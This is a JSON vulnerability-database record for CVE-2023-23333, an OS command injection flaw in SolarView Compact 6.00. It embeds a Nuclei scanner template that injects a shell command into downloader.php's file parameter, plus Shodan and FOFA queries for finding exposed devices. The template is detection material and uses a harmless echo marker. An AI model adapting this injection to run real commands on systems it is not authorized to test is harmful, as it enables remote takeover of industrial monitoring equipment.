{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-23333/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-23333/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-23333/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-23333/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-23333/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-23333"},"sightings":{"href":"/api/v1/sightings/cve-2023-23333"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-23333.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-23333\n\ninfo:\n  name: SolarView Compact 6.00 - OS Command Injection\n  author: Mr-xn\n  severity: critical\n  description: |\n    SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.\n  impact: |\n    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.\n  remediation: |\n    Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.\n  reference:\n    - https://github.com/Timorlover/CVE-2023-23333\n    - https://github.com/Mr-xn/CVE-2023-23333\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-23333\n    - http://packetstormsecurity.com/files/174537/SolarView-Compact-6.00-Remote-Command-Execution.html\n    - https://github.com/h00die-gr3y/Metasploit\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-23333\n    cwe-id: CWE-77\n    epss-score: 0.99291\n    epss-percentile: 0.99937\n    cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: contec\n    product: solarview_compact_firmware\n    shodan-query:\n      - http.html:\"SolarView Compact\"\n      - http.favicon.hash:\"-244067125\"\n      - http.html:\"solarview compact\"\n      - cpe:\"cpe:2.3:o:contec:solarview_compact_firmware\"\n    fofa-query:\n      - body=\"SolarView Compact\" && title=\"Top\"\n      - body=\"solarview compact\" && title=\"top\"\n      - icon_hash=\"-244067125\"\n      - body=\"solarview compact\"\n  tags: cve,cve2023,packetstorm,solarview,rce,contec,vkev,vuln\nvariables:\n  cmd: \"echo+CVE-2023-23333|rev\"\n\nhttp:\n  - raw:\n      - |\n        @timeout: 25s\n        GET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"text/html\"\n\n      - type: regex\n        part: body\n        regex:\n          - '33332-3202-EVC'\n\n      - type: status\n        status:\n          - 200\n# digest: 490a00463044022058a48c8b6de3e38870fe5d5edbef6abd2c3ba0100b7f2bfef6b11a327ac6db5a02205f1d660cbb198fa78f7f0df76be085c761c56ef6afe901c4b5baac33ecb6b4cb:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-23333"}